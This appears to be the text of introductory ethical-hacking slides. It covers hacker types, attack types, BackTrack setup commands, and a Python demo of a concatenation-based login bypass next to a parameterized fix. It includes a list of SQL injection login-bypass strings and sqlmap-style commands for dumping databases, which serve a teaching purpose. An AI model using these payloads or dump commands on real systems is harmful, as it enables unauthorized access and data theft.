
Ethical Hacking

About me

S.H.M. Sameera Chathuranga
Senior Software Engineer
MSc (Stud.), BSc (Hons) Software Eng. (Java Tech. Special), SCJP, AJD, SCWCD
Institute of Java and Technological Studies
Software Department

Ethical Hacker
The definition of an Ethical Hacker is very similar to a Penetration Tester. The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods and techniques as a Hacker.

Types of hacker
I. White Hat
II. Black Hat
III. Grey Hat
IV. Hacktivist
V. Phreaker

White Hat
A white hat has the skills to break into computer systems and do damage. However, they use their skills to help organizations. For example, a white hat might work for an organization to test for security weaknesses and vulnerabilities in the network.

Black Hat
A black hat, also known as a cracker, uses his skills to break into computer systems for unethical reasons. For example, to steal user data such as usernames and passwords, credit card numbers, and bank information.

Grey Hat
This type can be thought of as a white hat attacker who sometimes acts unethically. They could be employed as a legit network security administrator. But, during this person's duties, he may find an opportunity for gaining access to company data and stealing that data.

Phreaker
A phreaker is simply a hacker of telecommunications. An example of this is tricking the phone system into letting you make free long distance calls.

Types of Hacking
SQL Injection
SQL Mapping
Social Engineering
Denial of Service
Sniffing
Phishing
Key loggers

SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into the database with elevated privileges.

Sniffing
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

Social Engineering
Online criminals can use sophisticated technology to try to gain access to your computer, or they can use something simpler and more insidious: social engineering. Social engineering is a way for criminals to gain access to your computer. The purpose of social engineering is usually to secretly install spyware or other malicious software or to trick you into handing over your passwords or other sensitive financial or personal information. Some online criminals find it easier to exploit human nature than to exploit holes in your software.

Denial of Service
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic (which can be e-mail or Transmission Control Protocol (TCP) packets).

Phishing
This is another type of keylogging: the user is brought to a webpage that resembles the legitimate one and is made to enter his password there, which is then delivered to the attacker's mailbox. It relies on social engineering.

Virtual Matching Diagram

Working with Back Track Environment


Type these commands:
sudo su
xrandr
xrandr -s 1280x1024 (or your resolution)

SQL Injection
0'or'0'='0
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0#
" or 0=0#
'or 1=1#
"or 1=1#
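Why the `0'or'0'='0` string from the list above gets past a login check built by string concatenation, and how a parameterized query stops it. This is an added example, not part of the original slides; the `users` table, its rows and the function names are constructed for illustration, using Python's built-in sqlite3 module.

```python
import sqlite3

def make_db():
    """In-memory users table with constructed sample rows.
    Plain-text passwords keep the example short; real systems store salted hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret-admin"), ("alice", "alice-pw")])
    return db

def login_vulnerable(db, username, password):
    """Concatenates input into the SQL text, so quotes in the input change the query."""
    sql = ("SELECT COUNT(*) FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    # With password 0'or'0'='0 the WHERE clause becomes
    #   username = 'admin' AND password = '0' or '0'='0'
    # and the trailing  or '0'='0'  is true for every row.
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, username, password):
    """Sends input as bound parameters, so it is only ever compared as data."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

def compare(username, password):
    """Return (vulnerable_result, parameterized_result) for one login attempt."""
    db = make_db()
    try:
        return (login_vulnerable(db, username, password),
                login_parameterized(db, username, password))
    finally:
        db.close()

if __name__ == "__main__":
    attempts = [("admin", "s3cret-admin"),   # correct password
                ("admin", "wrong"),          # wrong password
                ("admin", "0'or'0'='0")]     # string from the slide
    for user, pw in attempts:
        vuln, safe = compare(user, pw)
        print(f"{user!r} / {pw!r}: concatenated={vuln} parameterized={safe}")
```

The same three attempts make a useful regression test for any login query: the third must be rejected.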

Magazines
www.Phrack.org
www.hakin9.org
www.2600.com

Hacking Forums
http://hackhound.org/forums/page/index.html
https://www.hackthissite.org/
http://www.crackmes.de/
http://www.evilzone.org/
http://www.hack-tech.com/
http://www.binrev.com/forums/

python.py -u "URL" --dbs

python.py -u "URL" -D "database name" --tables

python.py -u "URL" -T table_name --columns

python.py -u "URL" -T table_name --dump

Thank you
